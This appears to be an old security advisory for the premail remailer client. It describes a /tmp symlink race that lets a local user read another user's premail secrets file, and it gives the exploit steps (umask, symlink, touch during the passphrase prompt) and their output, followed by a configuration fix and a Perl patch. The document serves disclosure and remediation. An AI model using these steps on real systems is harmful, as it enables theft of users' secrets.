

    Systems running premail


    There's a pretty nasty bug in premail that allows any non-root  to
    obtain the contents of the premail  secrets file.  This is a  race
    condition that can  be exploited because  an indefinite amount  of
    time can pass between the time that premail checks if the  secrets
    file exists and  when it tries  to write to  the file.   It can be
    exploited as follows:


	$ umask 111
	$ ln -s ~/premail-secrets-file /tmp/.premail-secrets.$<

    normal user:

	$ premail -login
    Remember to logout when done.
    Your premail passphrase, please:

    All   the    attacker    has   to    do    is   execute     "touch
    premail-secrets-file" between the time  that the user is  prompted
    for the passphrase and the time when the login is completed.

	$ ls -al premail-secrets-file
	-rw-rw-rw-   1 d00d    nogroup          19 Dec 20 19:01 premail-secrets-file
	$ cat premail-secrets-file
	[contents of premail secrets file]

    Credit for this goes to


    This  bug  can  be  fixed  in  two  ways.   One  way is to set the
    premail-secrets  setting  to  some  non-world-writable  directory.
    The second way is to apply the following patch:

    *** premail.orig        Fri Dec 20 18:46:01 1996
    --- premail     Fri Dec 20 18:55:54 1996
    *** 3574,3579 ****
     --- 3574,3582 ----
	  for ($triesleft = 2; !$done && $triesleft; $triesleft--) {
	    $pass = &getpass ($x);
    +       if(!-O $ps) {
    +               &error ("Secrets file exists and is owned by another user\n");
    +       }
	    $status = &decrypt_secrets ($ps_pgp, $ps, $pass);
	    if (!-s $ps) { unlink $ps; }
	    $done = (!$status && -e $ps);